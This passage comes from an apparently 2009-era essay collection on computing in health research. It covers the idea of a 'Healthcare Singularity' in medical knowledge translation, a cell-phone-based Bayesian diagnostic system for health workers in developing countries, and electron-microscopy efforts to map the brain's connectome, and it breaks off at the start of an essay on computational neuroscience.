surpass 1 million in 2012, as shown in Figure 1. Translating all of this emerging medical knowledge into practice is a staggering challenge. Five hundred years ago, Leonardo da Vinci could be a painter, engineer, musician, and scientist. One hundred years ago, it is said that a physician might have reasonably expected to know everything in the field of medicine.2 Today, a typical primary care doctor must stay abreast of approximately 10,000 diseases and syndromes, 3,000 medications, and 1,100 laboratory tests [6]. Research librarians estimate that a physician in just one specialty, epidemiology, needs 21 hours of study per day just to stay current [7]. Faced with this flood of medical information, clinicians routinely fall behind, despite specialization and sub-specialization [8]. The sense of information overload in medicine has been present for surprisingly many years. An 1865 speech by Dr. Henry Noyes to the American Ophthalmologic Society is revealing. He said that medical men strive manfully to keep up their knowledge of how the world of medicine moves on; but too often they are the first to accuse themselves of being unable to meet the duties of their daily calling. He went on to say, The preparatory work in the study of medicine is so great, if adequately done, that but few can spare time for its thorough performance. [9] 2 58 The speed at which definitive medical discoveries have broadly reached medical practice over the last two millennia has progressively increased, as shown in Figure 2 on the next page. Focusing on the last 150 years, in which the effects of industrialization and the information explosion have been most acute, the trajectory flattens slightly but remains largely linear, as the figure shows. (An asymptotic fit yields an r2 of 0.73, whereas the linear fit is 0.83.) Given that even the speed of light is finite, this trend will inevitably be Figure 1. asymptotic to the horizontal axis. Yet, The number of biomedical articles catalogued each year is increasing precipitously and is if the linearity can be sufficiently expected to surpass 1 million in 2012. maintained for a while, the next 20 years could emerge as a special time for healthcare as the translation from medical knowledge discovery to widespread medical practice becomes nearly instantaneous. The proximity of this trajectory to the axis occurs around the year 2025. In response to the dramatic computational progress observed with Moores Law and the growth in parallel and distributed computing architectures, Ray Kurzweil, in The Singularity Is Near, predicts that 2045 will be the year of the Singularity, when computers meet or exceed human computational ability and when their ability to recursively improve themselves can lead to an intelligence explosion that ultimately affects all aspects of human culture and technology [10]. Mathematics defines a singularity as a point at which an object changes its nature so as to attain properties that are no longer the expected norms for that class of object. Today, the dissemination path for medical information is complex and multi-faceted, involving commercials, lectures, brochures, colleagues, and journals. In a world with nearly instantaneous knowledge translation, dissemination paths would become almost entirely digital and direct. 59 Figure 2. While it took 2,300 years after the first report of angina for the condition to be commonly taught in medical curricula, modern discoveries are being disseminated at an increasingly rapid pace. Focusing on the last 150 years, the trend still appears to be linear, approaching the axis around 2025. 60 While the ideas around a technological singularity remain controversial,3 the authors refer to this threshold moment, when medical knowledge becomes liquid and its flow from research to practice (bench to bedside) becomes frictionless and immediate, as the Healthcare Singularity. The Promises of a PostHealthcare Singularity World Rofecoxib (Vioxx) was approved as safe and effective by the U.S. Food and Drug Administration (FDA) on May 20, 1999. On September 30, 2004, Merck withdrew it from the market because of concerns about the drugs potential cardiovascular side effects. The FDA estimates that in the 5 years that the drug was on the market, rofecoxib contributed to more than 27,000 heart attacks or sudden cardiac deaths and as many as 140,000 cases of heart disease [11]. Rofecoxib was one of the most widely used medications ever withdrawn; over 80 million people had taken the drug, which was generating US$2.5 billion a year in sales.4 Today, it is reasonable to expect that after an FDA announcement of a drugs withdrawal from the market, patients will be informed and clinicians will immediately prescribe alternatives. But current channels of dissemination delay that response. In a postHealthcare Singularity world, that expectation will be met. To enable instantaneous translation, journal articles will consist of not only words, but also bits. Text will commingle with code, and articles will be considered complete only if they include algorithms. With this knowledge automation, every new medication will flow through a cascade of post-market studies that are independently created and studied by leading academics across the oceans (effectively crowdsourcing quality assurance). Suspicious observations will be flagged in real time, and when certainty is reached, unsafe medications will disappear from clinical prescription systems in a rippling wave across enterprises and clinics. The biomedical information explosion will at last be contained and harnessed. Other scenarios of knowledge dissemination will be frictionless as well: medical residents can abandon the handbooks they have traditionally carried that list drugs of choice for diseases, opting instead for clinical systems that personalize healthcare and geographically regionalize treatments based on drug sensitivities that are drawn in real time from the local hospital microbiology lab and correlated with the patients genomic profile. 3 4 61 Knowledge discovery will also be enhanced. Practitioners will have access to high-performance, highly accurate databases of patient records to promote preventive medical care, discover successful treatment patterns [12, 13], and reduce medical errors. Clinicians will be able to generate cause-effect hypotheses, run virtual clinical trials to deliver personalized treatment plans, and simulate interventions that can prevent pandemics. Looking farther ahead, the instantaneous flow of knowledge from research centers to the front lines of clinical care will speed the treatment and prevention of newly emerging diseases. The moment that research labs have identified the epitopes to target for a new disease outbreak, protein/DNA/RNA/lipid synthesizers placed in every big hospital around the world will receive instructions, remotely transmitted from a central authority, directing the on-site synthesis of vaccines or even directed antibody therapies for rapid administration to patients. Progress Toward the Healthcare Singularity Companies such as Microsoft and Google are building new technologies to enable data and knowledge liquidity. Microsoft HealthVault and Google Health are Internet based, secure, and private consumer data clouds into which clinical patient data can be pushed from devices and other information systems. Importantly, once the data are in these patient clouds, they are owned by the patient. Patients themselves determine what data can be redistributed and to whom the data may be released. A February 2009 study by KLAS reviewed a new class of emerging data aggregation solutions for healthcare. These enterprise data aggregation solutions (enterprise data clouds) unify data from hundreds or thousands of disparate systems (such as MEDSEEK, Carefx, dbMotion, Medicity, and Microsoft Amalga).5 These platforms are beginning to serve as conduits for data to fill patient data clouds. A recent example is a link between New York-Presbyterians hospital-based Amalga aggregation system and its patients HealthVault service.6 Through these links, data can flow almost instantaneously from hospitals to patients. The emergence of consumer data clouds creates new paths by which new medical knowledge can reach patients directly. On April 21, 2009, Mayo Clinic announced the launch of the Mayo Clinic Health Advisory, a privacy- and security-enhanced 5 6 62 online application that offers individualized health guidance and recommendations built with the clinical expertise of Mayo Clinic and using secure and private patient health data from Microsoft HealthVault.7 Importantly, new medical knowledge and recommendations can be computationally instantiated into the advisory and applied virtually instantaneously to patients worldwide. New technology is bridging research labs and clinical practice. On April 28, 2009, Microsoft announced the release of Amalga Life Sciences, an extension to the data-aggregation class of products for use by scientists and researchers. Through this release, Microsoft is offering scalable data aggregation and liquidity solutions that link three audiences: patients, providers, and researchers. Companies such as Microsoft are building the pipeline to allow data and knowledge to flow through a semantically interoperable network of patients, providers, and researchers. These types of connectivity efforts hold the promise of effectively instantaneous dissemination of medical knowledge throughout the healthcare system. The Healthcare Singularity could be the gateway event to a new Age of Semantic Medicine. Instantaneous knowledge translation in medicine is not only immensely important, highly desirable, valuable, and achievable in our lifetimes, but perhaps even inevitable. References [1] F. Mosteller, Innovation and evaluation, Science, vol. 211, pp. 881886, 1981, doi: 10.1126/ science.6781066. [2] J. Lind, A Treatise of the Scurvy (1753). Edinburgh: University Press, reprinted 1953. [3] E. A. Balas, Information Systems Can Prevent Errors and Improve Quality, J. Am. Med. Inform. Assoc., vol. 8, no. 4, pp. 398399, 2001, PMID: 11418547. [4] A. C. Greiner and Elisa Knebel, Eds., Health Professions Education: A Bridge to Quality. Washington, D.C.: National Academies Press, 2003. [5] E. A. McGlynn, S. M. Asch, J. Adams, J. Keesey, J. Hicks, A. DeCristofaro, et al., The quality of health care delivered to adults in the United States, N. Engl. J. Med., vol. 348, pp. 26352645, 2003, PMID: 12826639. [6] T. H. Davenport and J. Glaser, Just-in-time delivery comes to knowledge management, Harv. Bus. Rev., vol. 80, no. 7, pp. 107111, 126, July 2002, doi: 10.1225/R0207H. [7] B. S. Alper, J. A. Hand, S. G. Elliott, S. Kinkade, M. J. Hauan, D. K. Onion, and B. M. Sklar, How much effort is needed to keep up with the literature relevant for primary care? J. Med. Libr. Assoc., vol. 92, no. 4, pp. 429437, Oct. 2004. [8] C. Lenfant, Clinical Research to Clinical Practice Lost in Translation? N. Engl. J. Med., vol. 349, pp. 868874, 2003, PMID: 12944573. [9] H. D. Noyes, Specialties in Medicine, June 1865. 63 [10] R. Kurzweil, The Singularity Is Near: When Humans Transcend Biology. New York: Penguin Group, 2005, p. 136. [11] D. J. Graham, D. Campen, R. Hui, M. Spence, C. Cheetham, G. Levy, S. Shoor, and W. A. Ray, Risk of acute myocardial infarction and sudden cardiac death in patients treated with cyclooxygenase 2 selective and non-selective non-steroidal anti-inflammatory drugs: nested casecontrol study, Lancet, vol. 365, no. 9458, pp. 475481, Feb. 511, 2005. [12] C. Plaisant, S. Lam, B. Shneiderman, M. S. Smith, D. Roseman, G. Marchand, M. Gillam, C. Feied, J. Handler, and H. Rappaport, Searching Electronic Health Records for temporal patterns in patient histories: A case study with Microsoft Amalga, Proc. Am. Med. Inform. Assoc., Washington, D.C., Nov. 2008. [13] T. Wang, C. Plaisant, A. Quinn, R. Stanchak, B. Shneiderman, and S. Murphy, Aligning temporal data by sentinel events: Discovering patterns in electronic health records, Proc. ACM CHI2008 Human Factors in Computing Systems Conference, ACM, New York, Apr. 2008, pp. 457466, doi: 10.1145/1357054.1357129. 64 H E A LT H A N D W E L L B E I N G Joel Robe rtson Del De Hart Robertson Research Institute Kr istin Tolle David H ecke r man Microsoft Research ringing intelligent healthcare informatics to bear on the dual problems of reducing healthcare costs and improving quality and outcomes is a challenge even in countries with a reasonably developed technology infrastructure. Much of medical knowledge and information remains in paper form, and even where it is digitized, it often resides in disparate datasets and repositories and in diverse formats. Data sharing is uncommon and frequently hampered by the lack of foolproof de-identification for patient privacy. All of these issues impede opportunities for data mining and analysis that would enable better predictive and preventive medicine. Developing countries face these same issues, along with the compounding effects of economic and geopolitical constraints, transportation and geographic barriers, a much more limited clinical workforce, and infrastructural challenges to delivery. Simple, high-impact deliverable interventions such as universal childhood immunization and maternal childcare are hampered by poor monitoring and reporting systems. A recent Lancet article by Christopher Murrays group concluded that immunization coverage has improved more gradually and not to the level suggested by countries official reports of WHO and UNICEF estimates. There is an urgent need for independent and contestable monitoring of health indicators in an era of global initiatives that are target- 65 oriented and disburse funds based on performance. [1] Additionally, the most recent report on the United Nations Millennium Development Goals notes that pneumonia kills more children than any other disease, yet in developing countries, the proportion of children under five with suspected pneumonia who are taken to appropriate health-care providers remains low. [2] Providing reliable data gathering and diagnostic decision support at the point of need by the bestThe NxOpinion health platform being used by trained individual available for care is Indian health extension workers. the goal of public health efforts, but tools to accomplish this have been expensive, unsupportable, and inaccessible. Below, we elaborate on the challenges facing healthcare delivery in developing countries and describe computer- and cell phonebased technology we have created to help address these challenges. At the core of this technology is the NxOpinion Knowledge Manager1 (NxKM), which has been under development at the Robertson Research Institute since 2002. This health platform includes a medical knowledge base assembled from the expertise of a large team of experts in the U.S. and developing countries, a diagnostic engine based on Bayesian networks, and cell phones for end-user interaction. Scale Up, Scale Out, and Scale In One of the biggest barriers to deployment of a decision support or electronic health record system is the ability to scale. The term scale up refers to a systems ability to support a large user basetypically hundreds of thousands or millions. Most systems are evaluated within a narrower scope of users. Scale out refers to a systems ability to work in multiple countries and regions as well as the ability to work across disease types. Many systems work only for one particular disease and are not easily regionalizedfor example, for local languages, regulations, and processes. Scale in refers to the ability of a system to capture and benchmark against a single 1 66 individual. Most systems assume a generic patient and fail to capture unique characteristics that can be effective in individualized treatment. With respect to scaling up, NxKM has been tested in India, Congo, Dominican Republic, Ghana, and Iraq. It has also been tested in an under-served inner-city community in the United States. In consultation with experts in database scaling, the architecture has been designed to combine multiple individual databases with a central de-identified database, thus allowing, in principle, unlimited scaling options. As for scaling out to work across many disease types and scaling in to provide accurate individual diagnoses, the amount of knowledge required is huge. For example, INTERNIST-1, an expert system for diagnosis in internal medicine, contains approximately 250,000 relationships among roughly 600 diseases and 4,000 findings [3]. Building on the earlier work of one of us (Heckerman), who developed efficient methods for assessing and representing expert medical knowledge via a Bayesian network [4], we have brought together medical literature, textbook information, and expert panel recommendations to construct a growing knowledge base for NxKM, currently including over 1,000 diseases and over 6,000 discrete findings. The system also scales in by allowing very fine-grained data capture. Each finding within an individual health record or diagnostic case can be tracked and monitored. This level of granularity allows for tremendous flexibility in determining factors relating to outcome and diagnostic accuracy. With regard to scaling out across a region, a challenge common to developing countries is the exceptionally diverse and region-specific nature of medical conditions. For example, a disease that is common in one country or region might be rare in another. Whereas rule-based expert systems must be completely reengineered in each region, the modular nature of the NxKM knowledge base, which is based on probabilistic similarity networks [4], allows for rapid customization to each region. The current incarnation of NxKM uses region-specific prevalence from expert estimates. It can also update prevalence in each region as it is used in the field. NxKM also incorporates a modular system that facilitates customization to terms, treatments, and language specific to each region. When region-specific information is unknown or unavailable, a default module is used until such data can be collected or identified. Diagnostic Accuracy and Efficiency Studies indicate that even highly trained physicians overestimate their diagnostic accuracy. The Institute of Medicine recently estimated that 44,000 to 98,000 67 preventable deaths occur each year due to medical error, many due to misdiagnosis [5]. In developing countries, the combined challenges of misdiagnoses and missing data not only reduce the quality of medical care for individuals but lead to missed outbreak recognition and flawed population health assessment and planning. Again, building on the diagnostic methodology from probabilistic similarity networks [4], NxKM employs a Bayesian reasoning engine that yields accurate diagnoses. An important component of the system that leads to improved accuracy is the ability to ask the user additional questions that are likely to narrow the range of possible diagnoses. NxKM has the ability to ask the user for additional findings based on value-of-information computations (such as a cost function) [4]. Also important for clinical use is the ability to identify the confidence in the diagnosis (i.e., the probability of the most likely diagnosis). This determination is especially useful for less-expert users of the system, which is important for improving and supervising the care delivered by health extension workers (HEWs) in developing regions where deep medical knowledge is rare. Getting Healthcare to Where It Is Needed: The Last Mile Another key challenge is getting diagnostics to where they are most needed. Because of their prevalence in developing countries, cell phones are a natural choice for a delivery vehicle. Indeed, it is believed that, in many such areas, access to cell phones is better than access to clean water. For example, according to the market database Wireless Intelligence,2 80 percent of the worlds population was within range of a cellular network in 2008. And figures from the International Telecommunication Union3 show that by the end of 2006, 68 percent of the worlds mobile subscriptions were in developing countries. More recent data from the International Telecommunications Union shows that between 2002 and 2007, cellular subscription was the most rapid growth area for telecommunication in the world, and that the per capita increase was greatest in the developing world.4 Consequently, we have developed a system wherein cell phones are used to access a centrally placed NxKM knowledge base and diagnostic engine implemented on a PC. We are now testing the use of this system with HEWs in rural India. In addition to providing recommendations for medical care to the HEWs, the phone/ 2 3 68 central-PC solution can be used to create portable personal health records. One of our partner organizations, School Health Annual Report Programme (SHARP), will use it to screen more than 10 million Indian schoolchildren in 2009, creating a unique virtual personal health record for each child. Another advantage of this approach is that the data collected by this system can be used to improve the NxKM knowledge base. For example, as mentioned above, information about region-specific disease prevalence is important for accurate medical diagnosis. Especially important is time-critical information about the outbreak of a disease in a particular location. As the clinical application is used, validated disease cases, including those corresponding to a new outbreak, are immediately available to NxKM. In addition, individual diagnoses can be monitored centrally. If the uploaded findings of an individual patient are found to yield a low-confidence diagnosis, the patient can be identified for follow-up. The User Interface A challenge with cellular technology is the highly constrained user interface and the difficulty of entering data using a relatively small screen and keypad. Our system simplifies the process in a number of ways. First, findings that are common for a single location (e.g., facts about a given village) are prepopulated into the system. Also, as mentioned above, the system is capable of generating questions specifically, simple multiple-choice questionsafter only basic information such as the chief complaint has been entered. In addition, questions can be tailored to the organization, location, or skill level of the HEW user. It is also important that the user interface be independent of the specific device hardware because users often switch between phones of different designs. Our interface application sits on top of a middle-layer platform that we have implemented for multiple devices. In addition to simple input, the interface allows easy access to important bits of information. For example, it provides a daily summary of patients needing care, including their diagnosis, village location, and previous caregivers. Data-Sharing Solutions Even beyond traditional legacy data silos (such as EPIC and CERNER) [5], barriers to sharing critical public health data still existincluding concerns about privacy and sovereignty. Data availability can also be limited regionally (e.g., in India and South Africa), by organizations (e.g., the World Health Organization, 69 NxOpinions innovative approach, which shows data when you want it, how you want it, and where you want it, using artificial intelligence. 70 World Vision, or pharmaceutical companies), or by providers (e.g., insurance companies and medical provider groups). Significant public health value resides in each of these datasets, and efforts should be made to overcome the barriers to gathering data into shared, de-identified global databases. Such public datasets, while useful on their own, also add significant value to proprietary datasets, providing valuable generic context to proprietary information. NxKM imports, manages, and exports data via publish sets. These processes allow various interest groups (governments, public health organizations, primary care providers, small hospitals, laboratory and specialty services, and insurance providers) to share the same interactive de-identified (privacy-preserving) global database while maintaining control of proprietary and protected data. Looking Forward Several challenges remain. While better educated HEWs are able to use these data collection and diagnostic decision support tools readily, other HEWs, such as Accredited Social Health Activists (ASHAs) and other front-line village workers, are often illiterate or speak only a local dialect. We are exploring two potential solutionsone that uses voice recognition technology and another that allows a user to answer multiple-choice questions via the cell phones numeric keypad. Voice recognition technology provides added flexibility in input, butat least so farit requires the voice recognizer to be trained by each user. Another challenge is unique and reproducible patient identificationverification that the subject receiving treatment is actually the correct patientwhen there is no standard identification system for most under-served populations. Voice recognition combined with face recognition and newer methods of biometrics, along with a corroborating GPS location, can help ensure that the patient who needs the care is the one actually receiving treatment. Another barrier is data integrity. For example, most rural individuals will report diagnoses that have not been substantiated by qualified medical personnel and could be erroneous. We have attempted to mitigate this issue by using an inference engine that allows for down-weighting of unsubstantiated evidence. Deploying systems that work anywhere in the world can lead to the creation of a massive amount of patient information. Storing, reconciling, and then accessing that information in the field, all while maintaining appropriate privacy and security, are exceptionally challenging when patient numbers are in the millions (instead of tens of thousands, as with most current electronic health record 71 systems). Further, feeding verified data on this scale back into the system to improve its predictive capability while maintaining the ability to analyze and retrieve specific segments (data mine) remains difficult. A final, and perhaps the greatest, obstacle is that of cooperation. If organizations, governments, and companies are willing to share a de-identified global database while protecting and owning their own database, medical science and healthcare can benefit tremendously. A unified database that allows integration across many monitoring and evaluation systems and databases should help in quickly and efficiently identifying drug resistance or outbreaks of disease and in monitoring the effectiveness of treatments and healthcare interventions. The global database should support data queries that guard against the identification of individuals and yet provide sufficient information for statistical analyses and validation. Such technology is beginning to emerge (e.g., [6]), but the daunting challenge of finding a system of rewards that encourages such cooperation remains. Summary We have developed and are beginning to deploy a system for the acquisition, analysis, and transmission of medical knowledge and data in developing countries. The system includes a centralized component based on PC technology that houses medical knowledge and data and has real-time diagnostic capabilities, complemented by a cell phonebased interface for medical workers in the field. We believe that such a system will lead to improved medical care in developing countries through improved diagnoses, the collection of more accurate and timely data across more individuals, and the improved dissemination of accurate and timely medical knowledge and information. When we stop and think about how a world of connected personal health records can be used to improve medicine, we can see that the potential impact is staggering. By knowing virtually every individual who exists, the diseases affecting that person, and where he or she is located; by improving data integrity; and by collecting the data in a central location, we can revolutionize medicine and perhaps even eradicate more diseases. This global system can monitor the effects of various humanitarian efforts and thereby justify and tailor efforts, medications, and resources to specific areas. It is our hope that a system that can offer high-quality diagnoses as well as collect and rapidly disseminate valid data will save millions of lives. Alerts and responses can become virtually instantaneous and can thus lead to the identification of drug resistance, outbreaks, and effective treatments in a fraction of the 72 time it takes now. The potential for empowering caregivers in developing countries though a global diagnostic and database system is enormous. References [1] S. S. Lim, D. B. Stein, A. Charrow, and C. J. L. Murray, Tracking progress towards universal childhood immunisation and the impact of global initiatives: a systematic analysis of three-dose diphtheria, tetanus, and pertussis immunisation coverage, Lancet, vol. 372, pp. 20312046, 2008, doi: 10.1016/S0140-6736(08)61869-3. [2] The Millennium Development Goals Report. United Nations, 2008. [3] R. A. Miller, M. A. McNeil, S. M. Challinor, F. E. Masarie, Jr., and J. D. Myers, The Internist-1/ Quick Medical Reference ProjectStatus Report, West. J. Med. vol. 145, pp. 816822, 1986. [4] D. Heckerman. Probabilistic Similarity Networks. Cambridge, MA: MIT Press, 1991. [5] L. Kohn, J. Corrigan, and M. Donaldson, Eds. To Err Is Human: Building a Safer Health System. Washington, D.C.: National Academies Press, 2000. [6] C. Dwork and K. Nissim, Privacy-Preserving Datamining on Vertically Partitioned Databases, Proc. CRYPTO, 2004, doi: 10.1.1.86.8559. 73 H E A LT H A N D W E L L B E I N G Jeff W. Lichtman R . Clay Reid Hanspete r Pfiste r Harvard University Michael F. Cohen Microsoft Research the most complex puzzle in all of biology. Every second in the human brain, billions of cortical nerve cells transmit billions of messages and perform extraordinarily complex computations. How the brain workshow its function follows from its structureremains a mystery. The brains vast numbers of nerve cells are interconnected at synapses in circuits of unimaginable complexity. It is largely assumed that the specificity of these interconnections underlies our ability to perceive and classify objects, our behaviors both learned (such as playing the piano) and intrinsic (such as walking), and our memoriesnot to mention controlling lower-level functions such as maintaining posture and even breathing. At the highest level, our emotions, our sense of self, our very consciousness are entirely the result of activities in the nervous system. At a macro level, human brains have been mapped into regions that can be roughly associated with specific types of activities. However, even this building-block approach is fraught with complexity because often many parts of the brain participate in completing a task. This complexity arises especially because most behaviors begin with sensory input and are followed by analysis, decision making, and finally a motor output or action. At the microscopic level, the brain comprises billions of neu- 75 rons, each connected to other neurons by up to several thousand synaptic connections. Although the existence of these synaptic circuits has been appreciated for over a century, we have no detailed circuit diagrams of the brains of humans or any other mammals. Indeed, neural circuit mapping has been attempted only once, and that was two decades ago on a small worm with only 300 nerve cells. The central stumbling block is the enormous technical difficulty associated with such mapping. Recent technological breakthroughs in imaging, computer science, and molecular biology, however, allow a reconsideration of this problem. But even if we had a wiring diagram, we would need to know what messages the neurons in the circuit are passingnot unlike listening to the signals on a computer chip. This represents the second impediment to understanding: traditional physiological methods let us listen to only a tiny fraction of the nerves in the circuit. To get a sense of the scale of the problem, consider the cerebral cortex of the human brain, which contains more than 160 trillion synaptic connections. These connections originate from billions of neurons. Each neuron receives synaptic connections from hundreds or even thousands of different neurons, and each sends information via synapses to a similar number of target neurons. This enormous fan-in and fan-out can occur because each neuron is geometrically complicated, possessing many receptive processes (dendrites) and one highly branched outflow process (an axon) that can extend over relatively long distances. One might hope to be able to reverse engineer the circuits in the brain. In other words, if we could only tease apart the individual neurons and see which one is connected to which and with what strength, we might at least begin to have the tools to decode the functioning of a particular circuit. The staggering numbers and complex cellular shapes are not the only daunting aspects of the problem. The circuits that connect nerve cells are nanoscopic in scale. The density of synapses in the cerebral cortex is approximately 300 million per cubic millimeter. Functional magnetic resonance imaging (fMRI) has provided glimpses into the macroscopic 3-D workings of the brain. However, the finest resolution of fMRI is approximately 1 cubic millimeter per voxelthe same cubic millimeter that can contain 300 million synapses. Thus there is a huge amount of circuitry in even the most finely resolved functional images of the human brain. Moreover, the size of these synapses falls below the diffraction-limited resolution of traditional optical imaging technologies. Circuit mapping could potentially be amenable to analysis based on color coding of neuronal processes [1] and/or the use of techniques that break through the 76 diffraction limit [2]. Presently, the gold standard for analyzing synaptic connections is to use electron microscopy (EM), whose nanometer (nm) resolution is more than sufficient to ascertain the finest details of neural connections. But to map circuits, one must overcome a technical hurdle: EM typically images very thin sections (tens of nanometers in thickness), so reconstructing a volume requires a serial reconstruction whereby the image information from contiguous slices of the same volume is recomposed into a volumetric dataset. There are several ways to generate such volumetric data (see, for example, [3-5]), but all of these have the potential to generate astonishingly large digital image data libraries, as described next. Some Numbers If one were to reconstruct by EM all the synaptic circuitry in 1 cubic mm of brain (roughly what might fit on the head of a pin), one would need a set of serial images spanning a millimeter in depth. Unambiguously resolving all the axonal and dendritic branches would require sectioning at probably no more than 30 nm. Thus the 1 mm depth would require 33,000 images. Each image should have at least 10 nm lateral resolution to discern all the vesicles (the source of the neurotransmitters) and synapse types. A square-millimeter image at 5 nm resolution is an image that has ~4 x1010 pixels, or 10 to 20 gigapixels. So the image data in 1 cubic mm will be in the range of 1 petabyte (250 ~ 1,000,000,000,000,000 bytes). The human brain contains nearly 1 million cubic mm of neural tissue. Some Successes to Date Given this daunting task, one is tempted to give up and find a simpler problem. However, new technologies and techniques provide glimmers of hope. We are pursuing these with the ultimate goal of creating a connectomea complete circuit diagram of the brain. This goal will require intensive and large-scale collaborations among biologists, engineers, and computer scientists. Three years ago, the Reid and Lichtman labs began working on ways to automate and accelerate large-scale serial-section EM. Focusing specifically on large cortical volumes at high resolution, the Reid group has concentrated on very high throughput as well as highly automated processes. So far, their work has been published only in abstract form [3], but they are confident about soon having the first 10 terabytes of volumetric data on fine-scale brain anatomy. Physiological experiments can now show the function of virtually every neuron in a 300 m cube. The new EM data has the resolution to show virtually every axon, dendrite, and 77 synapsethe physical connections that underlie neuronal function. The problem of separating and tracking the individual neurons within the volume remains. However, some successes have already been achieved using exotic means. Lichtmans lab found a way to express various combinations of red, green, and blue fluorescent proteins in genetically engineered mice. These random combinations presently provide about 90 colors or combinations of colors [1]. With this approach, it is possible to track individual neurons as they branch to their eventual synaptic connections to other neurons or to the end-organs in muscle. The multicolor labeled nerves (dubbed brainbow), shown in Figure 1, are reminiscent of the rainbow cables in computers and serve the same purpose: to disambiguate wires traveling over long distances. Because these colored labels are present in the living mouse, it is possible to track synaptic wiring changes by observing the same sites multiple times over minutes, days, or even months. Reids lab has been able to stain neurons of rat and cat visual cortices such that they light up when activated. By stimulating the cat with lines of different orientations, they have literally been able to see which neurons are firing, depending on the specific visual stimulus. By comparing the organization of the rats visual cortex to that of the cat, they have found that while a rats neurons appear to be randomly organized based on the orientation of the visual stimulus, a cats neurons exhibit remarkable structure. (See Figure 2.) Achieving the finest resolution using EM requires imaging very thin slices of neural tissue. One method begins with a block of tissue; after each imaging pass, a Figure 1. Brainbow images showing individual neurons fluorescing in different colors. By tracking the neurons through stacks of slices, we can follow each neurons complex branching structure to create the treelike structures in the image on the right. 78 Figure 2. Neurons in a visual cortex stained in vivo with a calcium-sensitive dye. Left: A 3-D reconstruction of thousands of neurons in a rat visual cortex, obtained from a stack of images (300 m on a side). The neurons are color coded according to the orientation of the visual stimulus that most excited them. Center: A 2-D image of the plane of section from the left panel. Neurons that responded to different stimulus orientations (different colors) are arranged seemingly randomly in the cortex. Inset: Color coding of stimulus orientations. Right: By comparison, the cat visual cortex is extremely ordered. Neurons that responded preferentially to different stimulus orientations are segregated with extraordinary precision. This image represents a complete 3-D functional map of over 1,000 neurons in a 300x300x200 m volume in the visual cortex [6, 7]. thin slice is removed (and destroyed) from the block, and then the process is repeated. Researchers in the Lichtman group at Harvard have developed a new devicea sort of high-tech lathe that they are calling an Automatic Tape-Collecting Lathe Ultramicrotome (ATLUM)that can allow efficient nanoscale imaging over large tissue volumes. (See Figure 3 on the next page.) The ATLUM [3]large enough to span entire multi-region neuronal circuitscan be quickly and reliably reduced to a tape of ultrathin sections. SEM images of these ATLUM-collected sections can attain lateral resolutions of 5 nm or bettersufficient to image individual synaptic vesicles and to identify and trace all circuit connectivity. The thin slices are images of one small region at a time. Once a series of individual images is obtained, these images must be stitched together into very large images 79 Tissue rotates Knife advances These synchronized motions produce a spiral cut through the tissue block, yielding a continuous ribbon of tissue in the knifes water boat Knifes water level adjusted via this inlet tube Figure 3. The Automatic Tape-Collecting Lathe Ultramicrotome (ATLUM), which can allow efficient nanoscale imaging over large tissue volumes. and possibly stacked into volumes. At Microsoft Research, work has proceeded to stitch together and then interactively view images containing billions of pixels.1 Once these gigapixel-size images are organized into a hierarchical pyramid, the HD View application can stream requested imagery over the Web for viewing.2 This allows exploration of both large-scale and very fine-scale features. Figure 4 shows a walkthrough of the result. Once the images are captured and stitched, multiple slices of a sample must be stacked to assemble them into a coherent volume. Perhaps the most difficult task at that point is extracting the individual strands of neurons. Work is under way at Harvard to provide interactive tools to aid in outlining individual processes and then tracking them slice to slice to pull out each dendritic and axonal fiber [8, 9]. (See Figure 5.) Synaptic interfaces are perhaps even harder to find automatically; however, advances in both user interfaces and computer vision give hope that the whole process can be made tractable. Decoding the complete connectome of the human brain is one of the great challenges of the 21st century. Advances at both the biological level and technical level are certain to lead to new successes and discoveries, and they will hopefully help answer fundamental questions about how our brain performs the miracle of thought. 1 2 80 Figure 4. HD View allows interactive exploration of this 2.5-gigapixel image. Left: A slice of neural tissue. The large gray feature in the center is a nucleus of a neuron. Center: A close-up of a capillary and myelinated axon. Right: Close-up myelin layers encircling the crosssection of an axon. Bottom: A zoomed-in view showing tiny vesicles surrounding a synaptic connection between very fine structures. Figure 5. NeuroTrace allows neuroscientists to interactively explore and segment neural processes in highresolution EM data. 81 References [1] J. Livet, T. A. Weissman, H. Kang, R. W. Draft, J. Lu, R. A. Bennis, J. R. Sanes, and J. W. Lichtman, Transgenic strategies for combinatorial expression of fluorescent proteins in the nervous system, Nature, vol. 450, pp. 5662, 2007, doi: 10.1038/nature06293. [2] S. Hell, Microscopy and its focal switch, Nature Methods, vol. 6, pp. 2432, 2009, doi: 10.1038/ NMeth.1291. [3] D. Bock, W. C. Lee, A. Kerlin, M. L. Andermann, E. Soucy, S. Yurgenson, and R. C. Reid, Highthroughput serial section electron microscopy in mouse primary visual cortex following in vivo two-photon calcium imaging, Soc. Neurosci. Abstr., vol. 769, no. 12, 2008. [4] W. Denk and H. Horstmann, Serial block-face scanning electron microscopy to reconstruct three-dimensional tissue nanostructure, PLoS Biol., vol. 2, p. e329, 2004, doi: 10.1017/ S1431927606066268. [5] K. J. Hayworth, N. Kasthuri, R. Schalek, and J. W. Lichtman, Automating the Collection of Ultrathin Serial Sections for Large Volume TEM Reconstructions, Microsc. Microanal., vol. 12, pp. 8687, 2006. [6] K. Ohki, S. Chung, Y. H. Chng, P. Kara, and R. C. Reid, Functional imaging with cellular resolution reveals precise microarchitecture in visual cortex, Nature, vol. 433, pp. 597603, 2005, doi:10.1038/nature03274. [7] K. Ohki, S. Chung, P. Kara, M. Hbener, T. Bonhoeffer, and R. C. Reid, Highly ordered arrangement of single neurons in orientation pinwheels, Nature, vol. 442, pp. 925928, 2006, doi:10.1038/nature05019. [8] W. Jeong, J. Beyer, M. Hadwiger, A. Vazquez, H. Pfister, and R. Whitaker, Scalable and Interactive Segmentation and Visualization of Neural Processes in EM Datasets, IEEE Trans. Visual. Comput. Graphics, Oct. 2009. [9] A. Vazquez, E. Miller, and H. Pfister, Multiphase Geometric Couplings for the Segmentation of Neural Processes, Proceedings of the IEEE Conference on Computer Vision Pattern Recognition (CVPR), June 2009. 82 H E A LT H A N D W E L L B E I N G lthough great strides have been made in neurobiology, we do not yet understand how the symphony of communication among neurons leads to rich, competent behaviors in animals. How do local interactions among neurons coalesce into the behavioral dynamics of nervous systems, giving animals their impressive abilities to sense, learn, decide, and act in the world? Many details remain cloaked in mystery. We are excited about the promise of gaining new insights by applying computational methods, in particular machine learning and inference procedures, to generate explanatory models from data about the activities of populations of neurons. For most of the history of electrophysiology, neurobiologists have monitored the membrane properties of neurons of vertebrates and invertebrates by using glass micropipettes filled with a conducting solution. Mastering techniques that would impress the most expert of watchmakers, neuroscientists have 